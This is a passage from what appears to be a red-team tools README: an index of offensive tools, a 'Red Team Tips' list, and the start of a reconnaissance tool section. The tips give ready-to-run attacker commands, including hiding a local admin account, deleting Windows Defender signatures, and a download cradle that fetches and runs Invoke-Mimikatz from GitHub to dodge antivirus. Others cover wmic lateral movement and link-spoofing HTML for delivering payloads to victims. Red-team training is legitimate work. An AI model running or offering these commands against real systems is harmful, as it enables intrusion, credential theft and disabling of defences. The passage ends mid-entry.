\u003Cli>\u003Cb>\u003Ca href=\"#powerlessshell\">PowerLessShell\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Remote PowerShell without PowerShell\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#psexec\">PsExec\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Light-weight telnet-replacement\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#liquidsnake\">LiquidSnake\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Fileless lateral movement\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#enabling-rdp\">Enabling RDP\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows RDP enable command\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#upgrading-shell-to-meterpreter\">Upgrading shell to meterpreter\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Reverse shell improvement\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#forwarding-ports\">Forwarding Ports\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Local port forward command\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#jenkins-reverse-shell\">Jenkins reverse shell\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Jenkins shell command\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#adfspoof\">ADFSpoof\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Forge AD FS security tokens\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#kerbrute\">kerbrute\u003C\u002Fa>\u003C\u002Fb>\u003Ci> A tool to perform Kerberos pre-auth bruteforcing\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#coercer\">Coercer\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Coerce a Windows server to authenticate\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#wmiops\">WMIOps\u003C\u002Fa>\u003C\u002Fb>\u003Ci> WMI remote commands\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Collection\u003C\u002Fb> 3 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#bloodhound\">BloodHound\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active directory visualisation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#snaffler\">Snaffler\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active directory credential collector\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#linwinpwn\">linWinPwn\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory Enumeration and Vulnerability checks\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Command and Control\u003C\u002Fb> 9 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#living-off-trusted-sites-project\">Living Off Trusted Sites Project\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Leverage legitimate domains for your C2\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#havoc\">Havoc\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#covenant\">Covenant\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (.NET)\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#merlin\">Merlin\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (Golang)\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#metasploit-framework\">Metasploit Framework\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (Ruby)\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#pupy\">Pupy\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (Python)\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#brute-ratel\">Brute Ratel\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework ($$$)\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#nimplant\">NimPlant\u003C\u002Fa>\u003C\u002Fb>\u003Ci> C2 implant written in Nim\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#hoaxshell\">Hoaxshell\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell reverse shell\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Exfiltration\u003C\u002Fb> 6 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n\t \u003Cli>\u003Cb>\u003Ca href=\"#dnscat2\">Dnscat2\u003C\u002Fa>\u003C\u002Fb>\u003Ci> C2 via DNS tunneling\u003C\u002Fi>\u003C\u002Fli>\n\t \u003Cli>\u003Cb>\u003Ca href=\"#cloakify\">Cloakify\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Data transformation for exfiltration\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#pyexfil\">PyExfil\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Data exfiltration PoC\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#powershell-rat\">Powershell RAT\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Python based backdoor\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#gd-thief\">GD-Thief\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Google drive exfiltration\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#goshs\">goshs\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Single-binary multi-protocol server for file transfer and exfiltration \u003C\u002Fi>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Impact\u003C\u002Fb> 4 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#conti-pentester-guide-leak\">Conti Pentester Guide Leak\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Conti ransomware group affilate toolkit\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#slowloris\">SlowLoris\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Simple denial of service\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#usbkill\">usbkill\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Anti-forensic kill-switch\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#keytap\">Keytap\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Get pressed keyboard keys from typing audio\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n \nRed Team Tips\n====================\n\n*Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.*\n\n### [๐Ÿ”™](#tool-list)Improved HTML smuggling with mouse move eventlistener\n\n**Description:** *'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti evasion in sandbox's the zip wont drop.'*\n\n**Credit:** [@pr0xylife](https:\u002F\u002Fx.com\u002Fpr0xylife)\n\n**Link:** [Twitter](https:\u002F\u002Fx.com\u002Fpr0xylife\u002Fstatus\u002F1598410732516802563)\n\n### [๐Ÿ”™](#tool-list)Google translate for phishing\n\n**Description:** *Successful phishing page credential stealing being proxied via the google translate page view functionality.*\n\n**Credit:** [@malmoeb](https:\u002F\u002Fx.com\u002Fmalmoeb)\n\n**Link:** [Twitter](https:\u002F\u002Fx.com\u002Fmalmoeb\u002Fstatus\u002F1671106885590630400)\n\n### [๐Ÿ”™](#tool-list)Hiding the local admin account\n\n```bash\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \u002Ft REG_DWORD \u002Fv alh4zr3d \u002Fd 0 \u002Ff\n```\n\n**Description:** *'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1612913838999113728)\n\n### [๐Ÿ”™](#tool-list)Cripple windows defender by deleting signatures\n\n```bash\n\"%Program Files%\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n```\n\n**Description:** *'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1611005101262389250)\n\n### [๐Ÿ”™](#tool-list)Enable multiple RDP sessions per user\n\n```bash\nreg add HKLM\\System\\CurrentControlSet\\Control\\TerminalServer \u002Fv fSingleSessionPerUser \u002Fd 0 \u002Ff\n```\n\n**Description:** *'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1609954528425558016)\n\n### [๐Ÿ”™](#tool-list)Sysinternals PsExec.exe local alternative\n\n```bash\nwmic.exe \u002Fnode:10.1.1.1 \u002Fuser:username \u002Fpassword:pass process call create cmd.exe \u002Fc \" command \"\n```\n\n**Description:** *'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux\u002Fstatus\u002F1607473627922063360)\n\n### [๐Ÿ”™](#tool-list)Live off the land port scanner\n\n```bash\n0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\u003Ctgt_ip>,$_)) \"Port $_ open\"} 2>$null\n```\n\n**Description:** *'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell\u002F.NET help. Ex: simple port scanner in Powershell.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1605060950339588096)\n\n### [๐Ÿ”™](#tool-list)Proxy aware PowerShell DownloadString\n\n```bash\n$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString(\"\u003Curl>\")\n```\n\n**Description:** *'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1596192664398966785)\n\n### [๐Ÿ”™](#tool-list)Looking for internal endpoints in browser bookmarks\n\n```bash\ntype \"C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\" | findstr \u002Fc \"name url\" | findstr \u002Fv \"type\"\n```\n\n**Description:** *'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1595488676389171200)\n\n### [๐Ÿ”™](#tool-list)Query DNS records for enumeration\n\n```bash\nGet-DnsRecord -RecordType A -ZoneName FQDN -Server \u003Cserver hostname>\n```\n\n**Description:** *'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC\u002FDNS server for all DNS records?'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1587132627823181824)\n\n### [๐Ÿ”™](#tool-list)Unquoted service paths without PowerUp\n\n```bash\nGet-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq \"Auto\" -and $_.PathName -notlike \"C:\\Windows*\" -and $_.PathName -notlike '\"*'} | select PathName,DisplayName,Name\n```\n\n**Description:** *'Finding unquoted service paths without PowerUp'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1579254955554136064)\n\n### [๐Ÿ”™](#tool-list)Bypass a disabled command prompt with \u002Fk\n\n```bash\n# Win+R (To bring up Run Box)\ncmd.exe \u002Fk \"whoami\"\n```\n\n**Description:** *'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use \u002Fk via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.*\n\n**Credit:** Martin Sohn Christensen\n\n**Link:** [Blog](https:\u002F\u002Fimprosec.com\u002Ftech-blog\u002Fthe-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you)\n\n### [๐Ÿ”™](#tool-list)Stop windows defender deleting mimikatz.exe\n\n```bash\n(new-object net.webclient).downloadstring('https:\u002F\u002Fraw.githubusercontent[.]com\u002FBC-SECURITY\u002FEmpire\u002Fmain\u002Fempire\u002Fserver\u002Fdata\u002Fmodule_source\u002Fcredentials\u002FInvoke-Mimikatz.ps1')|IEX;inv\n```\n\n**Description:** *'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux\u002Fstatus\u002F1605629049660809216)\n\n### [๐Ÿ”™](#tool-list)Check if you are in a virtual machine\n\n```bash\nreg query HKLM\\SYSTEM \u002Fs | findstr \u002FS \"VirtualBox VBOX VMWare\"\n```\n\n**Description:** *'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'*\n\n**Credit:** [@dmcxblue](https:\u002F\u002Ftwitter.com\u002Fdmcxblue)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002Fdmcxblue\u002Fstatus\u002F1366779034672136194)\n\n### [๐Ÿ”™](#tool-list)Enumerate AppLocker rules\n\n```\n(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\n```\n\n**Description:** *'AppLocker can be a pain. Enumerate to see how painful'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002Falh4zr3d\u002Fstatus\u002F1614706476412698624)\n\n### [๐Ÿ”™](#tool-list)CMD shortcut with 6 pixels via mspaint\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png)\n\n1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels\n2. Zoom in to make the following tasks easier\n3. Using the colour picker, set pixels values to (from left to right):\n - 1st: R: 10, G: 0, B: 0\n - 2nd: R: 13, G: 10, B: 13\n - 3rd: R: 100, G: 109, B: 99\n - 4th: R: 120, G: 101, B: 46\n - 5th: R: 0, G: 0, B: 101\n - 6th: R: 0, G: 0, B: 0\n4. Save it as 24-bit Bitmap (*.bmp;*.dib)\n5. Change its extension from bmp to bat and run.\n\n**Description:** *'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'*\n\n**Credit:** [PenTestPartners](https:\u002F\u002Fwww.pentestpartners.com\u002F)\n\n**Link:** [Blog](https:\u002F\u002Fwww.pentestpartners.com\u002Fsecurity-blog\u002Fbreaking-out-of-citrix-and-other-restricted-desktop-environments\u002F#gainingacommandshell)\n\n### [๐Ÿ”™](#tool-list)Link spoofing with PreventDefault JavaScript method\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png)\n\n```html\n\u003C!DOCTYPE html>\n\u003Chtml>\n \u003Chead>\n \u003Cmeta charset=\"UTF-8\">\n \u003Ctitle>PreventDefault Example\u003C\u002Ftitle>\n \u003C\u002Fhead>\n \u003Cbody>\n \u003Ca href=\"https:\u002F\u002Fgoogle.com\" onclick=\"event.preventDefault(); window.location.href = 'https:\u002F\u002Fbing.com';\">Go to Google\u003C\u002Fa>\n \u003C\u002Fbody>\n\u003C\u002Fhtml>\n```\n\n**Description:** *Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link `google.com`, but once clicked the victim will be redirected to your malicious link `bing.com`. Great for getting victims to download payloads via a controlled site.*\n\n**Link:** [PreventDefault Docs](https:\u002F\u002Fdeveloper.mozilla.org\u002Fen-US\u002Fdocs\u002FWeb\u002FAPI\u002FEvent\u002FpreventDefault)\n\n### [๐Ÿ”™](#tool-list)Check SMB firewall rules with Responder\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png)\n\n```powershell\nCopy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003Cip_running_responder>\\c$\"\n```\n\n**Description:** *'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: `Copy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003Cip_running_responder>\\c$\"`. If Responder could capture the hash, the firewall allows outgoing SMB connections'*\n\n**Credit:** [@malmoeb](https:\u002F\u002Ftwitter.com\u002Fmalmoeb)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002Fmalmoeb\u002Fstatus\u002F1628272928855826433)\n\n### [๐Ÿ”™](#tool-list)Disable AV with SysInternals PsSuspend\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002F4519f5ad-c177-4550-b9af-238fa73ad66e)\n\n**Description:** *Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.*\n\n**Related Blog Post:** [Bypassing AV via Process Suspension with PsSuspend.exe](https:\u002F\u002Fmedium.com\u002F@a-poc\u002Fprocess-suspension-with-pssuspend-exe-0cdf5d16a3b7)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002F0gtweet\u002Fstatus\u002F1638069413717975046)\n\nReconnaissance\n====================\n\n### [๐Ÿ”™](#tool-list)[spiderfoot](https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot)\n\nSpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.\n\nSpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.\n\n**Install:** \n\n```bash\nwget https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot\u002Farchive\u002Fv4.0.tar.gz\ntar zxvf v4.0.tar.gz\ncd spiderfoot-4.0\npip3 install -r requirements.txt\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot?tab=readme-ov-file#installing--running).\n\n**Usage:** \n\n```python\npython3 .\u002Fsf.py -l 127.0.0.1:5001\n```\n\nLots of usage tutorial videos [here](https:\u002F\u002Fasciinema.org\u002F~spiderfoot)\n\n![spiderfoot](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F1ce26a9e-6fa5-4987-9aea-4943b9c2efec)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot*\n\n### [๐Ÿ”™](#tool-list)[reconftw](https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw)\n\nreconFTW automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw.git;cd reconftw\u002F;.\u002Finstall.sh\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw\u002Fwiki\u002F0.-Installation-Guide).\n\n**Usage:** \n\n```bash\n# Single target domain\n.\u002Freconftw.sh -d target.com -r\n\n# One target with multiple domains\n.\u002Freconftw.sh -m target -l domains.txt -r\n\n# Passive recon\n.\u002Freconftw.sh -d target.com -p\n\n# Perform all checks and exploitations\n.\u002Freconftw.sh -d target.com -a\n```\n\nFor full usage instructions see [here](https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw\u002Fwiki\u002F2.-Usage-Guide).\n\n![reconftw](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F1a5abeb5-776d-4c10-a02c-934e1662d817)\n\n*Image used from https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=TQmDAtkD1Wo*\n\n### [๐Ÿ”™](#tool-list)[subzy](https:\u002F\u002Fgithub.com\u002FPentestPad\u002Fsubzy)\n\nSubdomain takeover tool which works based on matching response fingerprints from [can-i-take-over-xyz](https:\u002F\u002Fgithub.com\u002FEdOverflow\u002Fcan-i-take-over-xyz\u002Fblob\u002Fmaster\u002FREADME.md).\n\n**Install:** \n\n```bash\ngo install -v github.com\u002FPentestPad\u002Fsubzy@latest\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fgithub.com\u002FPentestPad\u002Fsubzy?tab=readme-ov-file#installation).\n\n**Usage:** \n\n```bash\n# List of subdomains\n.\u002Fsubzy run --targets list.txt\n\n# Single or multiple targets\n.\u002Fsubzy run --target test.google.com\n.\u002Fsubzy run --target test.google.com,https:\u002F\u002Ftest.yahoo.com\n```\n\n![subzy](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fd06bff41-8c0f-4d3d-b42e-1221b9866332)\n\n*Image used from https:\u002F\u002Fwww.geeksforgeeks.org\u002Fsubzy-subdomain-takeover-vulnerability-checker-tool\u002F*\n\n### [๐Ÿ”™](#tool-list)[smtp-user-enum](https:\u002F\u002Fgithub.com\u002Fcytopia\u002Fsmtp-user-enum)\n\nSMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.\n\n**Install:** \n\n```bash\npip install smtp-user-enum\n```\n\n**Usage:** \n\n```bash\nsmtp-user-enum [options] -u\u002F-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\n```\n\n![smtp-user-enum](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F2a965690-52f3-412a-90e3-54dd69e0b275)\n\n*Image used from https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fsmtp-user-enum\u002F*\n\n### [๐Ÿ”™](#tool-list)crt.sh -> httprobe -> EyeWitness\n\nI have put together a bash one-liner that: \n- Passively collects a list of subdomains from certificate associations ([crt.sh](https:\u002F\u002Fcrt.sh\u002F))\n- Actively requests each subdomain to verify it's existence ([httprobe](https:\u002F\u002Fgithub.com\u002Ftomnomnom\u002Fhttprobe))\n- Actively screenshots each subdomain for manual review ([EyeWitness](https:\u002F\u002Fgithub.com\u002FFortyNorthSecurity\u002FEyeWitness))\n\n**Usage:** \n\n```bash\ndomain=DOMAIN_COM;rand=$RANDOM;curl -fsSL \"https:\u002F\u002Fcrt.sh\u002F?q=${domain}\" | pup 'td text{}' | grep \"${domain}\" | sort -n | uniq | httprobe > \u002Ftmp\u002Fenum_tmp_${rand}.txt; python3 \u002Fusr\u002Fshare\u002Feyewitness\u002FEyeWitness.py -f \u002Ftmp\u002Fenum_tmp_${rand}.txt --web\n```\n\n*Note: You must have [httprobe](https:\u002F\u002Fgithub.com\u002Ftomnomnom\u002Fhttprobe), [pup](https:\u002F\u002Fgithub.com\u002FEricChiang\u002Fpup) and [EyeWitness](https:\u002F\u002Fgithub.com\u002FFortyNorthSecurity\u002FEyeWitness) installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains*\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png)\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png)\n\n### [๐Ÿ”™](#tool-list)[jsendpoints](https:\u002F\u002Ftwitter.com\u002Frenniepak\u002Fstatus\u002F1602620834463588352)\n\nA JavaScript bookmarklet for extracting all webpage endpoint links on a page.\n\nCreated by [@renniepak](https:\u002F\u002Ftwitter.com\u002Frenniepak), this JavaScript code snippet can be used to extract all endpoints (starting with \u002F) from the current webpage DOM including all external script sources embedded on the webpage.\n\n```javascript\njavascript:(function(){var scripts=document.getElementsByTagName(\"script\"),regex=\u002F(?\u003C=(\\\"|\\'|\\`))\\\u002F[a-zA-Z0-9_?&=\\\u002F\\-\\#\\.]*(?=(\\\"|\\'|\\`))\u002Fg;const results=new Set;for(var i=0;i\u003Cscripts.length;i++){var t=scripts[i].src;\"\"!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log(\"An error occurred: \",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+\"\u003Cbr>\")})}setTimeout(writeResults,3e3);})();\n```\n\n**Usage (Bookmarklet)** \n\nCreate a bookmarklet...\n\n- `Right click your bookmark bar`\n- `Click 'Add Page'`\n- `Paste the above Javascript in the 'url' box`\n- `Click 'Save'`\n\n...then visit the victim page in the browser and click the bookmarklet.\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png)\n\n**Usage (Console)** \n\nPaste the above Javascript into the console window `F12` and press enter. \n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png)\n\n### [๐Ÿ”™](#tool-list)[nuclei](https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei)\n\nFast vulnerability scanner that uses .yaml templates to search for specific issues.\n\n**Install:** \n\n```bash\ngo install -v github.com\u002Fprojectdiscovery\u002Fnuclei\u002Fv2\u002Fcmd\u002Fnuclei@latest\n```\n\n**Usage:** \n\n```bash\ncat domains.txt | nuclei -t \u002FPATH\u002Fnuclei-templates\u002F\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png)\n\n### [๐Ÿ”™](#tool-list)[certSniff](https:\u002F\u002Fgithub.com\u002FA-poc\u002FcertSniff)\n\ncertSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.\n\nYou can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FA-poc\u002FcertSniff;cd certSniff\u002F;pip install -r requirements.txt\n```\n\n**Usage:** \n\n```python\npython3 certSniff.py -f example.txt\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F223851512-068261fa-7070-4307-852c-7ef46d938b18.png)\n\n### [๐Ÿ”™](#tool-list)[gobuster](https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fgobuster\u002F)\n\nNice tool for brute forcing file\u002Ffolder paths on a victim website.\n\n**Install:** \n\n```bash\nsudo apt install gobuster\n```\n\n**Usage:** 